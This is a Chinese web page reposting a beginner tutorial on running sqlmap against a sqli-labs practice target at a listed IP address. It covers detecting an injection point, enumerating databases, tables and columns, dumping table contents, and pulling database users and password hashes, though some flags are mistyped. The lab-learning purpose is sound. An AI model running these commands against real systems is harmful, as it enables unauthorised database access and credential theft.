广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 数据库 >SQL注入之sqlmap入门学习
  • 730

0
分享到

SQL注入之sqlmap入门学习

sqlmap入门sqlmap注入 2023-05-12 05:05:42 730人浏览 安东尼
摘要

目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称

原来sql注入如此简单

以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。

一、判断是否存在注入点

使用命令:

使用命令:sqlmap -u "Http://49.232.78.252:83/Less-1/?id=1"

有图中白色背景的 则判断出有注入点

SQL注入之sqlmap入门学习

二、查询当前用户下所有数据库

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs

可以看到有五个表

SQL注入之sqlmap入门学习

三、获取数据库中的表名

选取一个challenges数据库,获取此库的表名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables

SQL注入之sqlmap入门学习

四、获取表中的字段名

选取表T5M0QG6FM2,获取其中字段名

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

SQL注入之sqlmap入门学习

五、获取字段内容

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

SQL注入之sqlmap入门学习

六、获取数据库的所有用户

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users

使用该命令就可以列出所有管理用户

SQL注入之sqlmap入门学习

七、获取数据库用户的密码

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passWords

SQL注入之sqlmap入门学习

八、获取当前网站数据库的名称

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

SQL注入之sqlmap入门学习

可以看到当前的数据库是 security

九、获取当前网站数据库的用户名称

使用命令:

sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user

当前用户是root

SQL注入之sqlmap入门学习

到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

您可能感兴趣的文档:
点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: SQL注入之sqlmap入门学习

本文链接: https://www.lsjlt.com/news/202073.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
  • SQL注入之sqlmap入门学习
    目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称...
    99+
    2023-05-12
    sqlmap入门 sqlmap注入
  • sqlmap深入学习
    整理下关于sql注入的资料链接学习链接:part1:http://www.freebuf.com/sectool/77948.htmlpart2:http://www.freebuf.com/sectool...
    99+
    2022-10-18
  • SQL注入篇学习之盲注/宽字节注入
    目录盲注布尔盲注时间盲注盲注函数length() 函数 返回字符串的长度演示语句burp抓包演示宽字节注入php魔术函数开启方式开启效果作用绕过方法宽字节注入总结 盲注 有...
    99+
    2022-11-13
  • 利用sqlmap进行post注入学习笔记
    了解sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,...
    99+
    2023-08-31
    网络安全 mysql web安全 Powered by 金山文档
  • java入门学习之路
    java是面向对象的编程,个人觉得记忆比较重要。第一阶段java基础部分unix开发环境熟练掌握开发中常用的操作系统linux的安装及使用:掌握文件系统、网络、用户管理方法:能熟练使用vi和vim进行文件编...
    99+
    2022-10-18
  • Python入门学习之operator-
    本模块主要包括一些Python内部操作符对应的函数。这些函数主要分为几类:对象比较、逻辑比较、算术运算和序列操作。 操作  语法 函数 相加 a + b  add(a, b) 字符串拼接 ...
    99+
    2023-01-31
    入门 Python operator
  • python入门之算法学习
    前言 参考学习书籍:《算法图解》[美]Aditya Bhargava,袁国忠(译)北京人民邮电出版社,2017 二分查找 binary_search 实现二分查找的python代码...
    99+
    2022-11-12
  • 【1day】PHPOK cms SQL注入学习
    注:该文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与作者无关。 目录 一、漏洞描述 二、资产测绘 三、漏洞复现  四、漏洞修复 一、漏洞描述         PHPOK CMS是一个基于PHP语...
    99+
    2023-09-13
    安全 web安全
  • sql注入初中高学习
    以下三篇文件关于SQL注入写的很通俗易懂,整理收藏下******Web篇-SQL注入***初级:http://bbs.ichunqiu.com/thread-9518-1-1.html ******Web篇...
    99+
    2022-10-18
  • Workerman3.x 版本学习之入门
    用于学习Workerman的虚拟机配置信息如下(至于环境的安装,请参考官方手册自行解决):   Distributor ID:Ubuntu   Description:Ubuntu 14.04 LTS   Release:14.04   C...
    99+
    2023-01-31
    入门 版本
  • Android学习之Flux架构入门
    Flux 架构介绍 Flux 架构 被Facebook使用来构建他们的客户端web应用。跟Clean Architecture一样,它不是为移动应用设计的,但是它的特性和简单可...
    99+
    2022-06-06
    android学习 flux Android
  • node.js入门学习之url模块
    前言 今天主要记录的是关于node.js里面的一个简单的模块,url模块。这个url的模块要使用的话需要先引入。若只是在命令行里比如cmd或git bash 等使用url这个模块的话,是不需要require...
    99+
    2022-06-04
    模块 入门 node
  • Nodejs学习笔记之入门篇
    分享第一篇,关于 NodeJS —— Javascript 的常用知识以及如何从 Javascript 开发者过渡到 NodeJS 开发者(不会介绍具体的框架)。在读本文前,希望你对 javascript ...
    99+
    2022-06-04
    学习笔记 入门篇 Nodejs
  • python入门学习之变量篇
    【前言】在公司内部wiki上看到一个不错的学习网站,遂开始了我这慢悠悠的学习之旅。网站链接:https://www.codecademy.com1.理解布尔值一种数据类型。简单来说,正如你家里的电灯有开关两种状态一样,布尔值同样也有两个值,...
    99+
    2023-01-31
    变量 入门 python
  • SQL注入宽字节注入由浅到深学习
    目录前言基础知识宽字节宽字节注入例子例题一例题二SQLMAP应用结语前言 突然想起来之前讲SQL注入时忘记讲一下这个宽字节注入了,因为这个知识点还是挺重要的,所以本文就带大家了解一...
    99+
    2023-02-24
    SQL宽字节注入 SQL 注入
  • python入门学习
    首先在官网下载好python3.6及以上的版本,根据自己的系统选择:没有显示64位的就是32位的安装包,选择蓝线的能够直接打开 在控制台输入python,配置成功的图片如下: 从IDLE打开python输入指令 print("I lo...
    99+
    2023-01-31
    入门 python
  • MySQL入门学习
    ...
    99+
    2015-02-25
    MySQL入门学习
  • Node.js学习入门
    开始之前,安利一本正在看的书《站在两个世界的边缘》,作者程浩,上帝丢给他太多理想,却忘了给他完成理想的时间。OK,有兴趣的可以看一看。 node.js如标题一样,我也是刚开始接触,大家一起学习,有不当的地方...
    99+
    2022-06-04
    入门 Node js
  • python 学习之路1-如何入门
    过去20年,我一直有一个想法就是学一门编程语言,可惜一直没有实现。C我看过,C++也看过,PHP了解过,最后是的没有最后。。。。。 回望过去简单说就是没有懂到底学习了什么,也无法把学习到的知识应用到实际,然后往开发走,所有我...
    99+
    2023-01-31
    之路 入门 python
  • 从零学习node.js之express入门(六)
    一、 介绍 什么是express,为什么要使用express?根据官方网站的说法,express是一个基于 Node.js 平台的极简、灵活的web应用开发框架,它提供一系列强大的特性、丰富的API接口,对...
    99+
    2022-06-04
    入门 node js
软考高级职称资格查询
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作